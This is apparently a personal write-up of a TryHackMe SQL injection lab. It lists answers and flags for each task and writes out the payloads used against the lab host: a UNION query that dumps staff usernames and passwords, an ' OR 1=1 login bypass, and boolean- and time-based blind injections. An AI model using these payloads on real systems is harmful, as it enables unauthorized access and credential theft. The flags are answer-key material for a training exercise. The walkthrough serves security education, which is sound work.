Home SQL Injection
Post
Cancel

SQL Injection

Learn how to detect and exploit SQL Injection vulnerabilities

THM Room https://tryhackme.com/room/sqlinjectionlm

TASK 1 : Brief

What does SQL stand for?

Answer : Structured Query Language

TASK 2 : What is a Database?

What is the acronym for the software that controls a database?

Answer : DBMS

What is the name of the grid-like structure which holds the data?

Answer : table

TASK 3 : What is SQL?

What SQL statement is used to retrieve data?

Answer : SELECT

What SQL clause can be used to retrieve data from multiple tables?

Answer : UNION

What SQL statement is used to add data?

Answer : INSERT

TASK 4 : What is SQL Injection?

What character signifies the end of an SQL query?

Answer : semicolon “;”

TASK 5 : In-Band SQLi

What is the flag after completing level 1 ?

Read the text and follow the instructions.

The final query you’ll use should be :

1
https://website.thm/article?id=0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

Answer : THM{SQL_INJECTION_3840}

TASK 6 : Blind SQLi - Authentication Bypass

What is the flag after completing level two? (and moving to level 3)

The payload to use in the password field is :

1
' OR 1=1;--

Answer : THM{SQL_INJECTION_9581}

TASK 7 : Blind SQLi - Boolean Based

What is the flag after completing level three?

I follow the steps of enumeration discribe and the last injection is

1
https://website.thm/checkuser?username=admin123' UNION SELECT 1,2,3 from users where username like 'admin%' and password like '3845%';--

Answer : THM{SQL_INJECTION_1093}

TASK 8 : Blind SQLi - Time Based

What is the final flag after completing level four?

For this one, you have to repeat the process learnt in the TASK 7. I found the number of columns with :

1
admin123' UNION SELECT SLEEP(5),2;--

Then, i got the database name : sqli_four. when you repeat all the steps you’ll find the table name and the comumns.

The final query should be :

1
https://website.thm/checkuser?username=admin123' UNION SELECT sleep(2),2 from users where username='admin' and password like '4961%;--

Answer : THM{SQL_INJECTION_MASTER}

TASK 9 : Out-of-Band SQLi

Name a protocol beginning with D that can be used to exfiltrate data from a database.

Answer : DNS

TASK 10 : Remediation

Name a method of protecting yourself from an SQL Injection exploit.

Answer : Prepared Statements

This post is licensed under CC BY 4.0 by the author.